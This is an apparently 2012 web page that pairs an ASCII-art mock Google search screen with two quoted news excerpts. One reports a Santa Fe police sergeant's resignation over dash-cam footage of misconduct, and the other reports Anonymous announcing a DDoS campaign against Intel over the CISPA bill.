<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;,, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.g8&quot;&quot;&quot;bgd &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;`7MM &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.dP&acute; &nbsp;&nbsp;&nbsp;&nbsp;`M &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MM &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;dm&acute; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;` &nbsp;&nbsp;,pW&quot;Wq. &nbsp;&nbsp;,pW&quot;Wq. &nbsp;&nbsp;.P&quot;Ybmmm &nbsp;MM &nbsp;.gP&quot;Ya &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MM &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;6W&acute; &nbsp;&nbsp;`Wb 6W&acute; &nbsp;&nbsp;`WB :MI &nbsp;I8 &nbsp;&nbsp;&nbsp;MM ,M&acute; &nbsp;&nbsp;Yb &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MM. &nbsp;&nbsp;&nbsp;`7MMF&acute;8M &nbsp;&nbsp;&nbsp;&nbsp;MB 8M &nbsp;&nbsp;&nbsp;&nbsp;M8 &nbsp;WmmmP&quot; &nbsp;&nbsp;&nbsp;MM 8M&quot;&quot;&quot;&quot;&quot;&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;`Mb &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MM &nbsp;YA. &nbsp;&nbsp;,A9 YA. &nbsp;&nbsp;,A9 8M &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MM YM. &nbsp;&nbsp;&nbsp;, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;`&quot;bmmmdPY &nbsp;&nbsp;`Ybmd9&acute; &nbsp;&nbsp;`Ybmd9&acute; &nbsp;&nbsp;YMMMMMb .JMML.`Mbmmd&acute; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;6&acute; &nbsp;&nbsp;&nbsp;&nbsp;dP &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NET SEARCH ENGINE &nbsp;&nbsp;Ybmmmd&acute; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;TODAY&acute;S NEWS ╏ US WATCHES FOR NORTH KOREA&#39;S NEXT MOVE AF&#8230; [1] &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;╏ ROMNEY DELAYS FILING 2011 TAXES, EXPECTS&#8230; &nbsp;[2] &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;╏ UN TO VOTE SATURDAY ON OBSERVERS FOR SYRI&#8230; [3] &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;╏ ROMNEY COURTS GUN OWNERS AND PIVOTS TO GE&#8230; [4] &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">‖ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&acute;Google (S)earch&acute; or &acute;I&acute;m feeling (L)ucky&acute;? &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></p>
</td>
</tr>
</tbody>
</table>
</div>
<p>
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://rt.com/usa/news/caught-masturbating-car-eiskant-847/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://rt.com/usa/news/caught-masturbating-car-eiskant-847/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After scouring 10 hours of footage recorded from the dash camera of a cop cruiser, authorities in Santa Fe, NM found what they were looking for. There on tape was Sgt. Mike Eiskant, and to say he was caught red-handed could never be more appropriate.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The now former-Sgt. Eiskant has resigned from his position with the Santa Fe Police Department and has signed a statement saying he will never, ever serve again as an officer of the law.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But when you make national headlines after being caught on film in broad daylight masturbating in your own cop car while on the job &mdash; well, the odds of landing another job in law enforcement aren&rsquo;t particularly in your favor anyway.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Eiskant pleaded no contest last week for a plethora of charges which include two counts of attempt to commit a felony, one count of stalking, two counts of harassment, larceny and possession of marijuana. Admitting to guilt to any of those charges would land an officer of the law in hot water, but the real slip up seems to be stemming from an investigation conducted by a local news network that ended with tape recorded evidence of Eiskant masturbating in the front seat of his patrol car.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Santa Fe&rsquo;s KOB News says they spent over a month requesting and reviewing dash cam videos from Sgt. Eiskant&rsquo;s patrol car, which eventually paid off for a team of investigative journalists that got more than they expected. KOB describes the footage as containing what sounds like a zipper being manipulated and audible moans by way of the officer.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The footage reveals that Eiskant was leering at a photograph of a naked woman on his cell phone and at one point proclaimed, &ldquo;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Oh show me those big beautiful breasts, baby.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.ibtimes.co.uk/articles/327682/20120413/cispa-operation-defense-anonymous-pledges-attack-intel.htm"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ibtimes.co.uk/articles/327682/20120413/cispa-operation-defense-anonymous-pledges-attack-intel.htm</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Anonymous hacking collective has pledged to bring down the website of</span><a href="http://www.ibtimes.co.uk/topics/detail/500/intel/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Intel</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> in protest at an anti-piracy bill that would permit the US government to strengthen security networks against cyber-attacks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous called its members to launch a Distributed Denial of Service attack against the computer firm, but the company&#39;s website appeared to be still online.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With</span><a href="http://www.youtube.com/watch?v=45FoVOs42fU&amp;utm_medium=twitter&amp;utm_source=twitterfeed"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> a video posted on YouTube</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the collective announced Phase Two of Operation Defense, an initiative to fight the proposed Cyber Intelligence Sharing and Protection Act (Cispa), which has already drawn criticism from advocates of internet privacy and security experts.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Phase I of Operation Defense is running smoothly,&quot; says the video. &quot;We&#39;ve managed to disable most of our targets. Our targets include any corporation involved in the support of the Cyber Intelligence Sharing and Protection Act and those who were responsible in creating it.&quot;&nbsp;&nbsp;&nbsp; </span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the collective, Phase II will start in two weeks and will include demonstrations in the streets.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Attacks will not be limited to Distributed Denial of Service attacks,&quot; says the video. &quot;Phase II will commence on May 1 and will include coordinated physical protests outside locations belonging to the corporations.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Intel is one of the 30 private companies that have backed Cispa, which will enable businesses and the government to more easily share cyber-security information. Critics claim that the legislation contains few restraints on how and when the government may monitor private information, and that it may be likely to damage file sharers rather than foreign spies or hackers.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The list includes tech and IT companies such as Edison Electric, Microsoft, Facebook, IBM, US Telecom, Verizon Wireless and Symantec as well as communications and phone firms and associations such as the National Cable &amp; Telecommunications Association, AT&amp;T and Comptel.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This so-called cyber-security bill aims to prevent theft of &#39;government information&#39; and &#39;intellectual property&#39; and could let ISPs block your access to a website &#8211; or the whole internet,&quot; civil rights organisation Demand Progress said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Cispa also encourages companies to share information about you with the government and other corporations.</span></p>
